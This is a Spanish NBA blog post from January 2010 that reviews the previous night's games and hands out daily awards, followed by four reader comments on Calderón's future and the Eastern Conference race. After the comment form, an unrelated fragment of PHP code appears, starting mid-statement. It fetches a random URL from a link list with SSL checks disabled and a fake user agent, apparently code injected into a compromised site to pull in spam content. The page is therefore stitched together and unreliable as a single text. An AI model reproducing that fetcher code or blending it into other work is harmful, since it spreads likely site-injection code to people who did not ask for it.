La Crónica (20/01/2010)

21 de January de 2010 por TheDeerHunter

Jornada densa y complicada para todo el mundo. Jaque a los Celtics, que no fueron capaces de ganar en Detroit ni recuperando a Sheed. Coincidieron un extraordinario Stuckey y un gran Villanueva (que ya es coincidir) y los verdes dieron impropias facilidades por dentro.

Por lo que respecta a sus perseguidores, los Hawks ganaron bien a los Kings a pesar de uno de los mejores partidos conjuntos de Tyreke y Kevin Martin, mientras Howard puso los puntos sobre las “íes” humillando a Hibbert. Ambos equipos acechan a los verdes por la segunda plaza de la conferencia. Tremendo con todo lo que les ha caído el último mes.

Peor es lo de los Heat, que anoche alcanzaron la impresionante marca de 65 puntos contra Charlotte. Por poco los pupilos de Larry Brown no duplicaron la anotación de sus rivales y para colmo les birlan la 5ª plaza. Quién lo hubiera dicho.

De esta manera las cosas en el Este se normalizan, con la mayoría de sus equipos de playoff por encima del 50%. Son los Bulls y los Raptors se empeñan en estropearlo… Los primeros palmaron contra los Clippers y los segundos contra los Bucks, que se empeñan en seguir dando guerra. Paremos un segundo en este choque. Calderón parece haber recuperado nivel y perspectivas positivas. Brillará más en la medida de que le respete el cuerpo y de que NO coincida en pista con Turkoglu. El Turco está horrible y Bargnani ha vuelto a su eterno estado de letargo. Ni con Bosh en plan supermán el equipo gana y todo el mundo es consciente de que no es probable que continúe haciendo el canelo. Lo mejor para Calderón es que lo larguen siendo, como es, el mejor activo de Toronto. Siendo suplente será más fácil que nadie se lleve las manos a la cabeza.Viajemos al Oeste. Denver ganó de coña marinera a los Warriors, en la prórroga, con un Billups superlativo. Los Mavs también tiraron de milagro y de una brillante defensa final de Marion para salir vivos de Washington. En “el Álamo”, Boozer destrozó a Tim Duncan y los Blazers aguantan como jabatos su posición privilegiada ganando anoche en el Wachovia. Andre Miller ganó el partido y McMillan calladito. Va a ser cierto que el coach se marea menos con cuantas menos opciones tácticas disponibles tenga. Los Thunder batieron anoche la marca de victorias de todo el curso pasado con otro pasote de actuación de Durant aunque sufriendo en Minneapolis. En cambio, los Grizzlies dieron paso atrás en New Orleans. Eso sí,  los Hornets tuvieron que tirar de Posey para obrar otro milagro. Sólo los Suns ganaron fácil (cómo no) a los Nets. ¡Arde Oeste!

PREMIOS

MVP: Victoria de los Pistons y partidazo de Rodney Stuckey, de las pocas alegrías que puede tener Joe Dumars esta temporada. 27 puntos, 11 rebotes y 6 asistencias. Por su parte, Kevin Durant sigue a lo suyo y casi aburrido nombrarlo un día sí y otro también pero claro, casi siempre está en números parecidos a los de anoche (31 puntos y 10 rebotes). Otros que se salieron la pasada madrugada fueron Chris Paul (21 puntos, 6 rebotes y 13 asistencias) y sobretodo, Chauncey Billups, que aprovechando el partido frente los Warriors y la prórroga se fue a los 37 puntos, 8 rebotes y 8 asistencias.

Rookie: A pesar de los vaivenes del equipo, la pareja de rookies de los Kings sigue a gran nivel. 24 puntos para Tyreke y 16 más 8 rebotes para Omri Casspi. No me olvido de Stephen Curry y sus 15 puntos más 6 asistencias.

Sorpresa: Hacía varios partidos que Carlos Delfino había perdido la titularidad a los Bucks pero la ha recuperado a lo grande: 22 puntos, 8 rebotes y victoria frente los Raptors. A otro que le sienta estupendamente salir de titular y disfrutar de minutos es el, hasta hace poco, el hermano malo de Brook Lopez, Robin. Anoche 20 puntitos y 7 rebotes.

Decepción: Anoche, los Heat fueron totalmente aniquiliados por uno de sus competidores directos en la conferencia Este. Los Bobcats les pasaron por encima desde el minuto 1 y les dejaron en 65 puntos con un 29% de acierto en el tiro.

Esfuerzo en vano: En estos tiempos que corren me pregunto quién es el jugador céltico que más aporta al equipo. Yo empiezo a decantarme por Rajon Rondo, que ayer se fue a los 21 puntos, 8 rebotes, 7 asistencias y 4 robos. Lástima que sus compañeros, sobretodo el banquillo, no estuviera a la altura. En los Warriors, la pareja Ellis-Maggette se fue hasta los 72 puntos pero también fueron insuficientes. De toda manera el premio indiscutible del día se lo llevan los 44 puntos y 12 rebotes de Chris Bosh, el único jugador de los Raptors (posiblemente junto con Calderón) realmente enchufado ayer.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    El 5º puesto de los Bobcats merecidísimo, de hecho desde que empezaron a carburar con la llegada de Jackson y una terrible defensa a mi me lo parecen. Creo que salvo a los Celtics sanos y a los Magics al máximo nivel pueden ganar a cualquiera del Este en una serie de play-offs. Los equipos que en ataque se centran en un solo jugador se lo ponen demasiado facil y eso es lo que abunda en el Este.

      Citar

  2. sergio dice:
    #2

    Hombre.. los Cavs se centran en un jugador mas que ningun otro equipo salvo los Heat pero creo que tienen plantilla y recursos para no pasar demasiadas dificultades a la hora de eliminarlos. Y Atlanta tambien los meteria en el saco, si bien es cierto que la intermitencia de la que siempre hacen gala les puede costar un disgusto (tanto a ellos como a sus rivales…depende del dia)

    Duncan se quedo a un solo punto de llegar a los 20.000 puntos. Segundo que lo hara en una semana y ambos autenticos revolucionarios de la posicion de 4 en estos ultimos tiempos. Que dios bendiga al tito TIm.

    Cada dia me gustan mas los Thunder. Hay una lucha feroz en el Este con 6 equipos en 2 partidos de diferencia si no me equivoco. Precioso el tapon de Green para matar el partido.

    Por cierto, mañana Cavaliers vs. Lakers. ¿Le devolveran la machada de Navidad? ¿Se aprovechara LeBron de los problemas fisicos de Bryant? Yo no me lo pienso perder vaya…

      Citar

  3. max dice:
    #3

    De acuerdo con Deer en lo de Calderon. Lo mejor para él seria un traspaso, Toronto amenaza ruina. Estan hipotecados con los megacontratos de Bargnani y Turkoglu y si se va Bosh será un solar.
    Por otra parte, creo que Sergio no tiene minutos (aparte de la reaparición de Martin) desde el triple de Kobe en LA. No se si será un castigo de Westphal, pero a mi entender no tuvo culpa del bloqueo, de resbalar (falta de Vujacic??) y de quedar emparejado con Kobe. Por cierto, a partir de ahí, Sacramento lo ha perdido casi todo.

      Citar

  4. danicarba dice:
    #4

    A Calderón no lo traspasan porque principalmente él no quiere irse. Toronto ahora mismo no será un solar, pero no juegan a nada y no han sabido armar un buen equipo con epicentro en CB. El año pasado con JOneal y este año el Turco se han cargado las temporadas, y Bargniani no se sabe cuándo ni cómo va a aportar. CB se irá seguro, sería tonto de no hacerlo. En cuanto a Sergio, que se vuelva a Europa si realmente quiere jugar minutos al baloncesto. Si en los Kings no juega… a ver a dónde lo mandamos. No cabe ni en los Nets.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>